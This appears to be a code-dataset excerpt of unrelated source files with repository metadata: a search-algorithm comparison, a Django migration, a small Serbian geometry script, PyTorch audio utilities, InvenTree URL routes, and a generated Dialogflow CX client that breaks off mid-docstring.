def compare_searchers(problems, header, searchers=[breadth_first_tree_search,
breadth_first_graph_search, depth_first_graph_search,
iterative_deepening_search, depth_limited_search,
astar_search]):
def do(searcher, problem):
p = InstrumentedProblem(problem)
searcher(p)
return p
table = [[name(s)] + [do(s, p) for p in problems] for s in searchers]
print_table(table, header)
def compare_graph_searchers():
compare_searchers(problems=[GraphProblem('A', 'B', romania),
GraphProblem('O', 'N', romania),
GraphProblem('Q', 'WA', australia)],
header=['Searcher', 'Romania(A,B)', 'Romania(O, N)', 'Australia'])
| [
"[email protected]"
] | |
0b1cde1c5f80af4837b8282ef80c77174dc1c5e7 | 12f18662719d04d2404396b9059b60525528f557 | /findsportsordermanagement-master/purchaseorder/migrations/0018_purchaseorder_internal_notes.py | 45c5291a9d14c87910376425849d88f1c857c904 | [] | no_license | ujjalgoswami/ordermanagementcustomdashboard | 0bf4a5770d1913b257a43858d778e630e671a342 | acd18510b0934601d30bd717ea4b3fbb61ecfb5c | refs/heads/master | 2021-02-04T10:04:27.380674 | 2020-02-28T01:37:35 | 2020-02-28T01:37:35 | 243,653,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | # Generated by Django 2.2.4 on 2019-12-10 15:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('purchaseorder', '0017_orderline_reorder'),
]
operations = [
migrations.AddField(
model_name='purchaseorder',
name='internal_notes',
field=models.TextField(null=True),
),
]
| [
"[email protected]"
] | |
667a27f91a5feffa45b0df3b9f4c79d54a94be94 | af93b3909f86ab2d310a8fa81c9357d87fdd8a64 | /begginer/5. cas/zadatak5.py | f27bd47d532b65caf07d06877073feb078f9bbcb | [] | no_license | BiljanaPavlovic/pajton-kurs | 8cf15d443c9cca38f627e44d764106ef0cc5cd98 | 93092e6e945b33116ca65796570462edccfcbcb0 | refs/heads/master | 2021-05-24T14:09:57.536994 | 2020-08-02T15:00:12 | 2020-08-02T15:00:12 | 253,597,402 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | unos=input("Unesite stranice a i b:")
stranice=unos.split(" ")
obim=2*float(stranice[0])+2*float(stranice[1])
povrsina=float(stranice[0])*float(stranice[1])
print("O= ",obim)
print("P=",povrsina)
| [
"[email protected]"
] | |
99e4e4ca7bb40a4fc37e65d4d6c65b0a7d078685 | b9d75e3e37d08262321b0dc726639fc25f152caa | /utils.py | cc49eb7b6a45ee027cefe48ead6e43e9a20dab51 | [] | no_license | G-Wang/pytorch_FFTNet | a2712763ae7ee2fff9d002c931593987d6e25060 | b96486f6823e762e71c2e299739b925081e5bacf | refs/heads/master | 2020-04-08T22:14:18.563719 | 2018-08-31T07:38:21 | 2018-08-31T07:38:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,463 | py | import numpy as np
import torch
from torch.nn import functional as F
from scipy.special import expn
from torchaudio.transforms import MuLawEncoding, MuLawExpanding
def encoder(quantization_channels):
return MuLawEncoding(quantization_channels)
def decoder(quantization_channels):
return MuLawExpanding(quantization_channels)
def np_mulaw(x, quantization_channels):
mu = quantization_channels - 1
x_mu = np.sign(x) * np.log1p(mu * np.abs(x)) / np.log1p(mu)
return x_mu
def np_inv_mulaw(x, quantization_channels):
mu = quantization_channels - 1
x = np.sign(x) * (np.exp(np.abs(x) * np.log1p(mu)) - 1.) / mu
return x
def float2class(x, classes):
mu = classes - 1
return np.rint((x + 1) / 2 * mu).astype(int)
def class2float(x, classes):
mu = classes - 1
return x.astype(float) / mu * 2 - 1.
def zero_padding(x, maxlen, dim=0):
diff = maxlen - x.shape[dim]
if diff <= 0:
return x
else:
pad_shape = ()
for i in range(len(x.shape)):
if i != dim:
pad_shape += ((0, 0),)
else:
pad_shape += ((0, diff),)
return np.pad(x, pad_shape, 'constant')
def repeat_last_padding(x, maxlen):
diff = maxlen - x.shape[-1]
if diff <= 0:
return x
else:
pad_value = np.tile(x[..., [-1]], diff)
return np.concatenate((x, pad_value), axis=-1)
# this function is copied from https://github.com/braindead/logmmse/blob/master/logmmse.py
# change numpy to tensor
def logmmse(x, sr, noise_std=1 / 256):
window_size = int(0.02 * sr)
if window_size % 2 == 1:
window_size += 1
# noverlap = len1; hop_size = len2; window_size = len
noverlap = int(window_size * 0.75)
hop_size = window_size - noverlap
win = torch.hann_window(window_size)
win *= hop_size / win.sum()
nfft = 2 ** (window_size - 1).bit_length()
pad_pos = (nfft - window_size) // 2
noise = torch.randn(6, window_size) * noise_std
noise_fft = torch.rfft(F.pad(win * noise, (pad_pos, pad_pos)), 1)
noise_mean = noise_fft.pow(2).sum(-1).sqrt()
noise_mu = noise_mean.mean(0)
noise_mu2 = noise_mu.pow(2)
spec = torch.stft(x, nfft, hop_length=hop_size, win_length=window_size, window=win, center=False)
spec_copy = spec.clone()
sig2 = spec.pow(2).sum(-1)
vad_curve = vad(x, S=spec).float()
aa = 0.98
ksi_min = 10 ** (-25 / 10)
gammak = torch.min(sig2 / noise_mu2.unsqueeze(-1), torch.Tensor([40]))
for n in range(spec.size(1)):
gammak_n = gammak[:, n]
if n == 0:
ksi = aa + (1 - aa) * F.relu(gammak_n - 1)
else:
ksi = aa * spec_copy[:, n - 1].pow(2).sum(-1) / noise_mu2 + (1 - aa) * F.relu(gammak_n - 1)
ksi = torch.max(ksi, torch.Tensor([ksi_min]))
A = ksi / (1 + ksi)
vk = A * gammak_n
ei_vk = 0.5 * expint(vk)
hw = A * ei_vk.exp()
spec_copy[:, n] *= hw.unsqueeze(-1)
xi_w = torch.irfft(spec_copy.transpose(0, 1), 1, signal_sizes=torch.Size([nfft]))[:, pad_pos:-pad_pos]
origin = torch.irfft(spec.transpose(0, 1), 1, signal_sizes=torch.Size([nfft]))[:, pad_pos:-pad_pos]
xi_w_mask = vad_curve / 2 + 0.5
orign_mask = (1 - vad_curve) / 2
final_framed = xi_w * xi_w_mask.unsqueeze(-1) + origin * orign_mask.unsqueeze(-1)
xfinal = torch.zeros(final_framed.size(0) * hop_size + noverlap)
k = 0
for n in range(final_framed.size(0)):
xfinal[k:k + window_size] += final_framed[n]
k += hop_size
return xfinal
def expint(x):
x = x.detach().cpu().numpy()
x = expn(1, x)
return torch.from_numpy(x).float()
def vad(x, hop_size=256, S=None, k=5, med_num=9):
if S is None:
S = torch.stft(x, hop_size * 4, hop_length=hop_size)
energy = S.pow(2).sum(-1).mean(0).sqrt()
energy /= energy.max()
sorted_E, _ = energy.sort()
sorted_E_d = sorted_E[2:] - sorted_E[:-2]
smoothed = F.pad(sorted_E_d, (7, 7)).unfold(0, 15, 1).mean(-1)
sorted_E_d_peak = F.relu(smoothed[1:-1] - smoothed[:-2]) * F.relu(smoothed[1:-1] - smoothed[2:])
first, *dummy = torch.nonzero(sorted_E_d_peak) + 2
E_th = sorted_E[:first].mean() * k
decision = torch.gt(energy, E_th)
pad = (med_num // 2, med_num // 2)
decision = F.pad(decision, pad)
decision = decision.unfold(0, med_num, 1)
decision, _ = decision.median(dim=-1)
return decision
| [
"[email protected]"
] | |
7943c82bfb5eef6a125f551f9bf92c8ed87f9028 | 7da0e8d03548ec83ec717a076add2199e543e3dd | /InvenTree/part/urls.py | 75d5041b9c89cb54a2d092a2a95eaf92b5418bb4 | [
"MIT"
] | permissive | Devarshi87/InvenTree | 7b90cbf14699861436ab127b9b7638cee81e30c4 | 2191b7f71972d4c3ba7322cc93936801a168ab3c | refs/heads/master | 2020-05-15T04:25:03.289794 | 2019-04-18T12:42:36 | 2019-04-18T12:42:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,522 | py | from django.conf.urls import url, include
from . import views
supplier_part_detail_urls = [
url(r'edit/?', views.SupplierPartEdit.as_view(), name='supplier-part-edit'),
url(r'delete/?', views.SupplierPartDelete.as_view(), name='supplier-part-delete'),
url('^.*$', views.SupplierPartDetail.as_view(), name='supplier-part-detail'),
]
supplier_part_urls = [
url(r'^new/?', views.SupplierPartCreate.as_view(), name='supplier-part-create'),
url(r'^(?P<pk>\d+)/', include(supplier_part_detail_urls)),
]
part_detail_urls = [
url(r'^edit/?', views.PartEdit.as_view(), name='part-edit'),
url(r'^delete/?', views.PartDelete.as_view(), name='part-delete'),
url(r'^track/?', views.PartDetail.as_view(template_name='part/track.html'), name='part-track'),
url(r'^bom-export/?', views.BomDownload.as_view(), name='bom-export'),
url(r'^bom/?', views.PartDetail.as_view(template_name='part/bom.html'), name='part-bom'),
url(r'^build/?', views.PartDetail.as_view(template_name='part/build.html'), name='part-build'),
url(r'^stock/?', views.PartDetail.as_view(template_name='part/stock.html'), name='part-stock'),
url(r'^used/?', views.PartDetail.as_view(template_name='part/used_in.html'), name='part-used-in'),
url(r'^allocation/?', views.PartDetail.as_view(template_name='part/allocation.html'), name='part-allocation'),
url(r'^suppliers/?', views.PartDetail.as_view(template_name='part/supplier.html'), name='part-suppliers'),
url(r'^thumbnail/?', views.PartImage.as_view(), name='part-image'),
# Any other URLs go to the part detail page
url(r'^.*$', views.PartDetail.as_view(), name='part-detail'),
]
part_category_urls = [
url(r'^edit/?', views.CategoryEdit.as_view(), name='category-edit'),
url(r'^delete/?', views.CategoryDelete.as_view(), name='category-delete'),
url('^.*$', views.CategoryDetail.as_view(), name='category-detail'),
]
part_bom_urls = [
url(r'^edit/?', views.BomItemEdit.as_view(), name='bom-item-edit'),
url('^delete/?', views.BomItemDelete.as_view(), name='bom-item-delete'),
url(r'^.*$', views.BomItemDetail.as_view(), name='bom-item-detail'),
]
# URL list for part web interface
part_urls = [
# Create a new category
url(r'^category/new/?', views.CategoryCreate.as_view(), name='category-create'),
# Create a new part
url(r'^new/?', views.PartCreate.as_view(), name='part-create'),
# Create a new BOM item
url(r'^bom/new/?', views.BomItemCreate.as_view(), name='bom-item-create'),
# Individual part
url(r'^(?P<pk>\d+)/', include(part_detail_urls)),
# Part category
url(r'^category/(?P<pk>\d+)/', include(part_category_urls)),
url(r'^bom/(?P<pk>\d+)/', include(part_bom_urls)),
# Top level part list (display top level parts and categories)
url(r'^.*$', views.PartIndex.as_view(), name='part-index'),
]
"""
part_param_urls = [
# Detail of a single part parameter
url(r'^(?P<pk>[0-9]+)/?$', views.PartParamDetail.as_view(), name='partparameter-detail'),
# Parameters associated with a particular part
url(r'^\?.*/?$', views.PartParamList.as_view()),
url(r'^$', views.PartParamList.as_view()),
]
part_param_template_urls = [
# Detail of a single part field template
url(r'^(?P<pk>[0-9]+)/?$', views.PartTemplateDetail.as_view(), name='partparametertemplate-detail'),
# List all part field templates
url(r'^\?.*/?$', views.PartTemplateList.as_view()),
url(r'^$', views.PartTemplateList.as_view())
]
"""
| [
"[email protected]"
] | |
fce81db8d06a0acb025336f3230e94f6e442c914 | c7d3c8f2667b73e68878253a95d034fd7f1f0583 | /env/Lib/site-packages/google/cloud/dialogflowcx_v3beta1/services/transition_route_groups/client.py | ea13b5eb4ebc6271f1f9e44940f1da2f202aec95 | [] | no_license | jeevana28/ivrchatbot | e57e9b94b2b6c201e79d27036eca2e6c1f5deb56 | fe5d281ebf774f46861b8f8eaea0494baf115f67 | refs/heads/master | 2023-06-07T01:20:40.547119 | 2021-07-06T15:47:15 | 2021-07-06T15:47:15 | 361,155,397 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,168 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.dialogflowcx_v3beta1.services.transition_route_groups import pagers
from google.cloud.dialogflowcx_v3beta1.types import page
from google.cloud.dialogflowcx_v3beta1.types import transition_route_group
from google.cloud.dialogflowcx_v3beta1.types import (
transition_route_group as gcdc_transition_route_group,
)
from google.protobuf import field_mask_pb2 as field_mask # type: ignore
from .transports.base import TransitionRouteGroupsTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import TransitionRouteGroupsGrpcTransport
from .transports.grpc_asyncio import TransitionRouteGroupsGrpcAsyncIOTransport
class TransitionRouteGroupsClientMeta(type):
"""Metaclass for the TransitionRouteGroups client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[TransitionRouteGroupsTransport]]
_transport_registry["grpc"] = TransitionRouteGroupsGrpcTransport
_transport_registry["grpc_asyncio"] = TransitionRouteGroupsGrpcAsyncIOTransport
def get_transport_class(
cls, label: str = None,
) -> Type[TransitionRouteGroupsTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class TransitionRouteGroupsClient(metaclass=TransitionRouteGroupsClientMeta):
"""Service for managing
[TransitionRouteGroups][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup].
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "dialogflow.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TransitionRouteGroupsClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TransitionRouteGroupsClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> TransitionRouteGroupsTransport:
"""Return the transport used by the client instance.
Returns:
TransitionRouteGroupsTransport: The transport used by the client instance.
"""
return self._transport
@staticmethod
def flow_path(project: str, location: str, agent: str, flow: str,) -> str:
"""Return a fully-qualified flow string."""
return "projects/{project}/locations/{location}/agents/{agent}/flows/{flow}".format(
project=project, location=location, agent=agent, flow=flow,
)
@staticmethod
def parse_flow_path(path: str) -> Dict[str, str]:
"""Parse a flow path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/agents/(?P<agent>.+?)/flows/(?P<flow>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def intent_path(project: str, location: str, agent: str, intent: str,) -> str:
"""Return a fully-qualified intent string."""
return "projects/{project}/locations/{location}/agents/{agent}/intents/{intent}".format(
project=project, location=location, agent=agent, intent=intent,
)
@staticmethod
def parse_intent_path(path: str) -> Dict[str, str]:
"""Parse a intent path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/agents/(?P<agent>.+?)/intents/(?P<intent>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def page_path(
project: str, location: str, agent: str, flow: str, page: str,
) -> str:
"""Return a fully-qualified page string."""
return "projects/{project}/locations/{location}/agents/{agent}/flows/{flow}/pages/{page}".format(
project=project, location=location, agent=agent, flow=flow, page=page,
)
@staticmethod
def parse_page_path(path: str) -> Dict[str, str]:
"""Parse a page path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/agents/(?P<agent>.+?)/flows/(?P<flow>.+?)/pages/(?P<page>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def transition_route_group_path(
project: str, location: str, agent: str, flow: str, transition_route_group: str,
) -> str:
"""Return a fully-qualified transition_route_group string."""
return "projects/{project}/locations/{location}/agents/{agent}/flows/{flow}/transitionRouteGroups/{transition_route_group}".format(
project=project,
location=location,
agent=agent,
flow=flow,
transition_route_group=transition_route_group,
)
@staticmethod
def parse_transition_route_group_path(path: str) -> Dict[str, str]:
"""Parse a transition_route_group path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/agents/(?P<agent>.+?)/flows/(?P<flow>.+?)/transitionRouteGroups/(?P<transition_route_group>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def webhook_path(project: str, location: str, agent: str, webhook: str,) -> str:
"""Return a fully-qualified webhook string."""
return "projects/{project}/locations/{location}/agents/{agent}/webhooks/{webhook}".format(
project=project, location=location, agent=agent, webhook=webhook,
)
@staticmethod
def parse_webhook_path(path: str) -> Dict[str, str]:
"""Parse a webhook path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/agents/(?P<agent>.+?)/webhooks/(?P<webhook>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[credentials.Credentials] = None,
transport: Union[str, TransitionRouteGroupsTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transition route groups client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, TransitionRouteGroupsTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))
)
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
client_cert_source_func = (
mtls.default_client_cert_source() if is_mtls else None
)
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = (
self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT
)
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, TransitionRouteGroupsTransport):
# transport is a TransitionRouteGroupsTransport instance.
if credentials or client_options.credentials_file:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, "
"provide its scopes directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
)
def list_transition_route_groups(
self,
request: transition_route_group.ListTransitionRouteGroupsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTransitionRouteGroupsPager:
r"""Returns the list of all transition route groups in
the specified flow.
Args:
request (google.cloud.dialogflowcx_v3beta1.types.ListTransitionRouteGroupsRequest):
The request object. The request message for
[TransitionRouteGroups.ListTransitionRouteGroups][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.ListTransitionRouteGroups].
parent (str):
Required. The flow to list all transition route groups
for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.services.transition_route_groups.pagers.ListTransitionRouteGroupsPager:
The response message for
[TransitionRouteGroups.ListTransitionRouteGroups][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.ListTransitionRouteGroups].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a transition_route_group.ListTransitionRouteGroupsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, transition_route_group.ListTransitionRouteGroupsRequest
):
request = transition_route_group.ListTransitionRouteGroupsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.list_transition_route_groups
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTransitionRouteGroupsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def get_transition_route_group(
self,
request: transition_route_group.GetTransitionRouteGroupRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> transition_route_group.TransitionRouteGroup:
r"""Retrieves the specified
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup].
Args:
request (google.cloud.dialogflowcx_v3beta1.types.GetTransitionRouteGroupRequest):
The request object. The request message for
[TransitionRouteGroups.GetTransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.GetTransitionRouteGroup].
name (str):
Required. The name of the
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup].
Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>/transitionRouteGroups/<Transition Route Group ID>``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.types.TransitionRouteGroup:
An TransitionRouteGroup represents a group of
[TransitionRoutes][google.cloud.dialogflow.cx.v3beta1.TransitionRoute]
to be used by a
[Page][google.cloud.dialogflow.cx.v3beta1.Page].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a transition_route_group.GetTransitionRouteGroupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, transition_route_group.GetTransitionRouteGroupRequest
):
request = transition_route_group.GetTransitionRouteGroupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_transition_route_group
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def create_transition_route_group(
self,
request: gcdc_transition_route_group.CreateTransitionRouteGroupRequest = None,
*,
parent: str = None,
transition_route_group: gcdc_transition_route_group.TransitionRouteGroup = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> gcdc_transition_route_group.TransitionRouteGroup:
r"""Creates an
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup]
in the specified flow.
Args:
request (google.cloud.dialogflowcx_v3beta1.types.CreateTransitionRouteGroupRequest):
The request object. The request message for
[TransitionRouteGroups.CreateTransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.CreateTransitionRouteGroup].
parent (str):
Required. The flow to create an
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup]
for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
transition_route_group (google.cloud.dialogflowcx_v3beta1.types.TransitionRouteGroup):
Required. The transition route group
to create.
This corresponds to the ``transition_route_group`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
